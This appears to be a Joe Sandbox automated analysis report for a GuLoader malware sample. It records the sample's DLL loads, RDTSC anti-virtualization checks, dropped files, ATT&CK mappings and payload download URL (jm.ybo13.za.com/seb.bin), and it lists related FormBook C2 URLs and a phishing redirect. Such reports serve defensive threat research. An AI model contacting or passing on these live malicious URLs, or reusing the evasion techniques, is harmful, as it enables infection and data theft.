Source: C:\Users\user\Desktop\5WP9WCM8qV.exe	Process created: C:\Users\user\Desktop\5WP9WCM8qV.exe "C:\Users\user\Desktop\5WP9WCM8qV.exe"	Jump to behavior

Source: C:\Users\user\Desktop\5WP9WCM8qV.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\5WP9WCM8qV.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\5WP9WCM8qV.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\5WP9WCM8qV.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\5WP9WCM8qV.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\5WP9WCM8qV.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\5WP9WCM8qV.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\5WP9WCM8qV.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\5WP9WCM8qV.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\5WP9WCM8qV.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\5WP9WCM8qV.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\5WP9WCM8qV.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\5WP9WCM8qV.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\5WP9WCM8qV.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\5WP9WCM8qV.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\5WP9WCM8qV.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\5WP9WCM8qV.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\5WP9WCM8qV.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\5WP9WCM8qV.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\5WP9WCM8qV.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\5WP9WCM8qV.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\5WP9WCM8qV.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\5WP9WCM8qV.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\5WP9WCM8qV.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\5WP9WCM8qV.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\5WP9WCM8qV.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Desktop\5WP9WCM8qV.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\5WP9WCM8qV.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\5WP9WCM8qV.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\5WP9WCM8qV.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\5WP9WCM8qV.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\5WP9WCM8qV.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\5WP9WCM8qV.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\5WP9WCM8qV.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\5WP9WCM8qV.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\5WP9WCM8qV.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\5WP9WCM8qV.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\5WP9WCM8qV.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\5WP9WCM8qV.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\5WP9WCM8qV.exe	Section loaded: fwpuclnt.dll	Jump to behavior

Source: C:\Users\user\Desktop\5WP9WCM8qV.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\5WP9WCM8qV.exe

File written: C:\Users\user\AppData\Local\Temp\tmc.ini

Jump to behavior

Source: 5WP9WCM8qV.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: mshtml.pdb source: 5WP9WCM8qV.exe, 00000002.00000001.1524013890.0000000000649000.00000008.00000001.01000000.00000006.sdmp
Source:	Binary string: mshtml.pdbUGP source: 5WP9WCM8qV.exe, 00000002.00000001.1524013890.0000000000649000.00000008.00000001.01000000.00000006.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: Process Memory Space: 5WP9WCM8qV.exe PID: 7864, type: MEMORYSTR
Source: Yara match	File source: 00000000.00000002.1526284301.0000000006145000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3280318515.0000000003565000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\5WP9WCM8qV.exe

Code function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_10001B18

Source: C:\Users\user\Desktop\5WP9WCM8qV.exe

Code function: 0_2_10002DE0 push eax; ret

0_2_10002E0E

Source: C:\Users\user\Desktop\5WP9WCM8qV.exe

File created: C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\5WP9WCM8qV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\5WP9WCM8qV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\5WP9WCM8qV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\5WP9WCM8qV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\5WP9WCM8qV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\5WP9WCM8qV.exe	API/Special instruction interceptor: Address: 6179F5C
Source: C:\Users\user\Desktop\5WP9WCM8qV.exe	API/Special instruction interceptor: Address: 3599F5C

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\5WP9WCM8qV.exe	RDTSC instruction interceptor: First address: 61353DB second address: 61353DB instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F7A715C15F7h 0x00000006 inc ebp 0x00000007 test dh, FFFFFFEAh 0x0000000a inc ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\5WP9WCM8qV.exe	RDTSC instruction interceptor: First address: 35553DB second address: 35553DB instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F7A70DFEA47h 0x00000006 inc ebp 0x00000007 test dh, FFFFFFEAh 0x0000000a inc ebx 0x0000000b rdtsc

Source: C:\Users\user\Desktop\5WP9WCM8qV.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\5WP9WCM8qV.exe TID: 8028

Thread sleep time: -110000s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\5WP9WCM8qV.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\5WP9WCM8qV.exe	Code function: 0_2_00405846 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405846
Source: C:\Users\user\Desktop\5WP9WCM8qV.exe	Code function: 0_2_00406398 FindFirstFileW,FindClose,	0_2_00406398
Source: C:\Users\user\Desktop\5WP9WCM8qV.exe	Code function: 0_2_004027FB FindFirstFileW,	0_2_004027FB

Source: 5WP9WCM8qV.exe, 00000002.00000002.3283573105.0000000005400000.00000004.00000020.00020000.00000000.sdmp, 5WP9WCM8qV.exe, 00000002.00000002.3283573105.00000000053A8000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\5WP9WCM8qV.exe	API call chain: ExitProcess graph end node			graph_0-3759
Source: C:\Users\user\Desktop\5WP9WCM8qV.exe	API call chain: ExitProcess graph end node			graph_0-3939

Source: C:\Users\user\Desktop\5WP9WCM8qV.exe

Code function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_10001B18

Source: C:\Users\user\Desktop\5WP9WCM8qV.exe

Process created: C:\Users\user\Desktop\5WP9WCM8qV.exe "C:\Users\user\Desktop\5WP9WCM8qV.exe"

Jump to behavior

Source: C:\Users\user\Desktop\5WP9WCM8qV.exe

Code function: 0_2_00406077 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

0_2_00406077

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 Access Token Manipulation	1 Masquerading	OS Credential Dumping	21 Security Software Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	11 Process Injection	1 Virtualization/Sandbox Evasion	LSASS Memory	1 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Clipboard Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Access Token Manipulation	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	23 System Information Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
5WP9WCM8qV.exe	21%	ReversingLabs
5WP9WCM8qV.exe	100%	Avira	TR/Injector.dfdyf
5WP9WCM8qV.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll	0%	ReversingLabs

Source	Detection	Scanner	Label
http://jm.ybo13.za.com/seb.bin7	0%	Avira URL Cloud	safe
http://jm.ybo13.za.com/seb.binm4	0%	Avira URL Cloud	safe
http://jm.ybo13.za.com/seb.bin?	0%	Avira URL Cloud	safe
http://jm.ybo13.za.com/seb.binza.com/seb.bin	0%	Avira URL Cloud	safe
http://jm.ybo13.za.com/seb.binp4	0%	Avira URL Cloud	safe
http://jm.ybo13.za.com/seb.bin2476756634-1003q	0%	Avira URL Cloud	safe
http://jm.ybo13.za.com/seb.binlI	0%	Avira URL Cloud	safe
http://jm.ybo13.za.com/seb.binR4	0%	Avira URL Cloud	safe
http://jm.ybo13.za.com/seb.bin	0%	Avira URL Cloud	safe
http://jm.ybo13.za.com/seb.binZ	0%	Avira URL Cloud	safe
http://jm.ybo13.za.com/seb.bing4	0%	Avira URL Cloud	safe
http://jm.ybo13.za.com/seb.binU4C	0%	Avira URL Cloud	safe
http://jm.ybo13.za.com/seb.bin&4r	0%	Avira URL Cloud	safe
http://jm.ybo13.za.com/seb.binshqos.dll.mui	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
jm.ybo13.za.com	45.33.20.235	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://jm.ybo13.za.com/seb.bin	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://jm.ybo13.za.com/seb.binm4	5WP9WCM8qV.exe, 00000002.00000002.3283573105.00000000053E3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://jm.ybo13.za.com/seb.binza.com/seb.bin	5WP9WCM8qV.exe, 00000002.00000002.3283573105.00000000053E3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd	5WP9WCM8qV.exe, 00000002.00000001.1524013890.00000000005F2000.00000008.00000001.01000000.00000006.sdmp	false		high
http://jm.ybo13.za.com/seb.bin7	5WP9WCM8qV.exe, 00000002.00000002.3283573105.00000000053E3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://jm.ybo13.za.com/seb.binZ	5WP9WCM8qV.exe, 00000002.00000002.3283573105.00000000053E3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://jm.ybo13.za.com/seb.binlI	5WP9WCM8qV.exe, 00000002.00000002.3283573105.00000000053A8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://jm.ybo13.za.com/seb.binp4	5WP9WCM8qV.exe, 00000002.00000002.3283573105.00000000053E3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://jm.ybo13.za.com/seb.bin?	5WP9WCM8qV.exe, 00000002.00000002.3283573105.00000000053E3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://jm.ybo13.za.com/seb.binR4	5WP9WCM8qV.exe, 00000002.00000002.3283573105.00000000053E3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214	5WP9WCM8qV.exe, 00000002.00000001.1524013890.0000000000649000.00000008.00000001.01000000.00000006.sdmp	false		high
http://jm.ybo13.za.com/seb.bin2476756634-1003q	5WP9WCM8qV.exe, 00000002.00000002.3283573105.00000000053E3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd	5WP9WCM8qV.exe, 00000002.00000001.1524013890.00000000005F2000.00000008.00000001.01000000.00000006.sdmp	false		high
http://www.ftp.ftp://ftp.gopher.	5WP9WCM8qV.exe, 00000002.00000001.1524013890.0000000000649000.00000008.00000001.01000000.00000006.sdmp	false		high
http://nsis.sf.net/NSIS_ErrorError	5WP9WCM8qV.exe	false		high
http://jm.ybo13.za.com/seb.binshqos.dll.mui	5WP9WCM8qV.exe, 00000002.00000002.3283573105.00000000053E3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://jm.ybo13.za.com/seb.bing4	5WP9WCM8qV.exe, 00000002.00000002.3283573105.00000000053E3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://jm.ybo13.za.com/seb.bin&4r	5WP9WCM8qV.exe, 00000002.00000002.3283573105.00000000053E3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://jm.ybo13.za.com/seb.binU4C	5WP9WCM8qV.exe, 00000002.00000002.3283573105.00000000053E3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
45.33.20.235	jm.ybo13.za.com	United States		63949	LINODE-APLinodeLLCUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1549406
Start date and time:	2024-11-05 16:12:31 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 27s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	5WP9WCM8qV.exe renamed because original name is a hash value
Original Sample Name:	950a25a2f21613cae69f796f6a3eeab57f92b711afb746dfeafefa00d5bfad55.exe
Detection:	MAL
Classification:	mal88.troj.evad.winEXE@3/9@1/1
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 83% Number of executed functions: 49 Number of non-executed functions: 30
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: 5WP9WCM8qV.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
45.33.20.235	RFQ#_RE-S327_Supply_SA-19.exe	Get hash	malicious	FormBook	Browse	www.monoploygo.wiki/nb9a/?hD-8k62X=ByCwUpD9bW9YeruaTjt5XVsiYUEA835dS8hxjYvE8iM9cGFGcS6DBRANF64JDNmh+gWjFxCc+FX/QH31VJrNx7PjyZteJrYo3Q==&H4wHN=1BADxlExn
	CV.exe	Get hash	malicious	FormBook	Browse	www.optime19.com/mg0g/?ADahO=tVY02LJH709h9V&oNHH=JX9bRfLOpqNEOOymRBnYlJpdUNZW4H7R1nhebZtzBw39xumhyI7GOOmZ3KvTtyU7GUZkfEsfAOx+aJi2z4ryOla8ah+kBIEzFA==
	SHIPPING-DOCUMENTS.exe	Get hash	malicious	FormBook	Browse	www.currenttidesdigital.com/o3cp/?Kb6lFr=ajGNsnC4njIFWR6GrwU/KIUPT+4NdTO/Ds6Tr1Elkne+/rIcFjKv3O9TVd3UHeSOvYr/+0me/twPb8QNvIXZz6JEUlGgFmdbwbRYeCFBi4e0&pxa8h=h0ELTHh0
	17MtYGLcyb.exe	Get hash	malicious	FormBook, DBatLoader	Browse	www.susan-writes.com/kmge/
	ultimogeniture.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.franchisevideography.com/6vse/?BH=MP4aJTqYC4vQMBtENwlhfMq8DEkCA6FU41CifmM7zlVilMBpP7k0fJAVYKZLDpHGK+bW65bO27W9Q0vaj6/TZG0ALnN1iW9mqQ==&Ku3lb=Dc1klz2LrFZKe
	SOLICITUD_DE_PRESUPUESTO_RFQ_#180222CO24_y_#160222CO71.scr.exe	Get hash	malicious	DBatLoader, FormBook	Browse	www.totomata.com/u6gs/?TtYxuD=llexJSnf1bqvIVoYINfXRvsI/1nlkp43QmTStd0GVcOzSebbOO9MZhccGRJM6/y6umhHsuORbDq4yFfMn4TD5jJtw2e2ClpEJg==&UJZb9=6xtG
	prueba_de_pago.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.plsaoyyhf.buzz/6qe8/?zpw70yIL=ukXk827klQRsiWdsCTzapSwRv6S0Tq2RCfNGTUtN8osxvW3Stx1qonaHetOqbhKCeZoP1W/chE9C1Y2lCuKwY3vn2DNefZiQIg==&qFve=NxiAZrupvj8Izu
	pedido.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.plsaoyyhf.buzz/6qe8/?UWDf=ukXk827klQRsiWdsCTzapSwRv6S0Tq2RCfNGTUtN8osxvW3Stx1qonaHetOqbhKCeZoP1W/chE9C1Y2lCuKwY3vn2DNefZiQIg==&2a-3kS=OtbxWYkeWKlhu
	CC_MAIA_T#U00c9CNICApdf.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.drew.life/f3ne/?Af1=aLdyTF7u4Mn5ivCQ/pmN9IHAmtdhc41T1wfm96PwIns4f2YBQzc780H9m9l5cbzlXgstcL/7rHPnIQQcqLRSI/FTPho9I2pX6A==&MT=0J4HTK8cwbjdI5y-
	http://api.blusmark.com	Get hash	malicious	Unknown	Browse	api.blusmark.com/?gp=1&js=1&uuid=1689002908.0096766536&other_args=eyJ1cmkiOiAiLyIsICJhcmdzIjogIiIsICJyZWZlcmVyIjogImh0dHA6Ly9hcGkuYmx1c21hcmsuY29tLyIsICJhY2NlcHQiOiAidGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksaW1hZ2UvYXZpZixpbWFnZS93ZWJwLGltYWdlL2FwbmcsKi8qO3E9MC44LGFwcGxpY2F0aW9uL3NpZ25lZC1leGNoYW5nZTt2PWIzO3E9MC45In0=

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
jm.ybo13.za.com	K8ZvbdkrGx.exe	Get hash	malicious	GuLoader	Browse	45.33.2.79
	K8ZvbdkrGx.exe	Get hash	malicious	GuLoader	Browse	45.56.79.23
	SecuriteInfo.com.Trojan.GenericKD.74281746.21507.1551.exe	Get hash	malicious	GuLoader	Browse	62.72.43.173
	SecuriteInfo.com.Trojan.GenericKD.74281746.21507.1551.exe	Get hash	malicious	GuLoader	Browse	62.72.43.173
	UMOWA_09.BAT.exe	Get hash	malicious	FormBook, GuLoader	Browse	62.72.43.173
	UMOWA_09.BAT.exe	Get hash	malicious	FormBook, GuLoader	Browse	62.72.43.173

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
LINODE-APLinodeLLCUS	K8ZvbdkrGx.exe	Get hash	malicious	GuLoader	Browse	45.33.2.79
	K8ZvbdkrGx.exe	Get hash	malicious	GuLoader	Browse	45.56.79.23
	https://www.google.lu/url?q=dK5oN8bP2yJ1vL3qF6gT0cR9mW4sH7jD2uY8kX5zM0nW4rT9pB6yG3lF1oJ8qV2kN7dP5uC3xH6tR0jL4wY1vS9mD2bT8nK7yX5rJ3qG0sW6lP9oF2aH1kpQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&esrc=026rlFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bgalapagos%C2%ADhostal%C2%AD%C2%ADtintorera%C2%AD.com%2Fauoth%2Fmeme%2Fnexpoint.com/c2pvaG5zb25AbmV4cG9pbnQuY29t	Get hash	malicious	Mamba2FA	Browse	66.228.61.234
	MV Sunshine.exe	Get hash	malicious	FormBook	Browse	45.33.30.197
	sora.mips.elf	Get hash	malicious	Mirai	Browse	172.104.45.34
	Payload 94.75 (2).225.exe	Get hash	malicious	Unknown	Browse	139.162.11.98
	Payload 94.75.225.exe	Get hash	malicious	Unknown	Browse	178.79.154.219
	hiss.arm7.elf	Get hash	malicious	Unknown	Browse	139.162.173.19
	hiss.arm.elf	Get hash	malicious	Unknown	Browse	66.228.39.163

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll	K8ZvbdkrGx.exe	Get hash	malicious	GuLoader	Browse
	K8ZvbdkrGx.exe	Get hash	malicious	GuLoader	Browse
	JOSXXL1.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	Certificado FNMT-RCM.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	Produccion.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	SecuriteInfo.com.Trojan.GenericKD.74281746.21507.1551.exe	Get hash	malicious	GuLoader	Browse
	SecuriteInfo.com.Trojan.GenericKD.74281746.21507.1551.exe	Get hash	malicious	GuLoader	Browse
	UMOWA_09.BAT.exe	Get hash	malicious	FormBook, GuLoader	Browse
	UMOWA_09.BAT.exe	Get hash	malicious	FormBook, GuLoader	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\BooConf.ini

Download File

Process:	C:\Users\user\Desktop\5WP9WCM8qV.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	45
Entropy (8bit):	4.7748605961854445
Encrypted:	false
SSDEEP:	3:FR3tWAAQLQIfLBJXlFGfv:/ktQkIPeH
MD5:	8B9FC0443D7E48145E2D4B37AFB2D37B
SHA1:	64A5718A478A38AC262D2E46DA81D0E88C122A0F
SHA-256:	4F743978EAD44260F895C983689D718E31CA826161C447D205021A9D3E010AFA
SHA-512:	5126DA1D29F662465241C8B51B95783DF3F88C8FEB8BB1B65DCF354738C48AAB4BFB6C0035DFE6B40FA03AE5AABA8F72F1C31343AEC7D4EDB9C6EBCC773CC3D3
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	[ReBoot]..Ac=user32::EnumWindows(i r2 ,i 0)..

C:\Users\user\AppData\Local\Temp\nse2681.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\5WP9WCM8qV.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	11776
Entropy (8bit):	5.655335921632966
Encrypted:	false
SSDEEP:	192:eF24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35Ol9Sl:h8QIl975eXqlWBrz7YLOl9
MD5:	EE260C45E97B62A5E42F17460D406068
SHA1:	DF35F6300A03C4D3D3BD69752574426296B78695
SHA-256:	E94A1F7BCD7E0D532B660D0AF468EB3321536C3EFDCA265E61F9EC174B1AEF27
SHA-512:	A98F350D17C9057F33E5847462A87D59CBF2AAEDA7F6299B0D49BB455E484CE4660C12D2EB8C4A0D21DF523E729222BBD6C820BF25B081BC7478152515B414B3
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: K8ZvbdkrGx.exe, Detection: malicious, Browse Filename: K8ZvbdkrGx.exe, Detection: malicious, Browse Filename: JOSXXL1.exe, Detection: malicious, Browse Filename: Certificado FNMT-RCM.exe, Detection: malicious, Browse Filename: Produccion.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Trojan.GenericKD.74281746.21507.1551.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Trojan.GenericKD.74281746.21507.1551.exe, Detection: malicious, Browse Filename: UMOWA_09.BAT.exe, Detection: malicious, Browse Filename: UMOWA_09.BAT.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L...]..V...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..b....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmc.ini

Download File

Process:	C:\Users\user\Desktop\5WP9WCM8qV.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	27
Entropy (8bit):	4.134336113194451
Encrypted:	false
SSDEEP:	3:iGAeSMn:lAeZ
MD5:	7AB6006A78C23C5DEC74C202B85A51A4
SHA1:	C0FF9305378BE5EC16A18127C171BB9F04D5C640
SHA-256:	BDDCBC9F6E35E10FA203E176D28CDB86BA3ADD97F2CFFD2BDA7A335B1037B71D
SHA-512:	40464F667E1CDF9D627642BE51B762245FA62097F09D3739BF94728BC9337E8A296CE4AC18380B1AED405ADB72435A2CD915E3BC37F6840F34781028F3D8AED6
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	[Access]..Setting=Enabled..

C:\Users\user\AppData\Roaming\lsrivelserne\Mommies\svindelen\Udrmmes\Dominerendes.Ges

Download File

Process:	C:\Users\user\Desktop\5WP9WCM8qV.exe
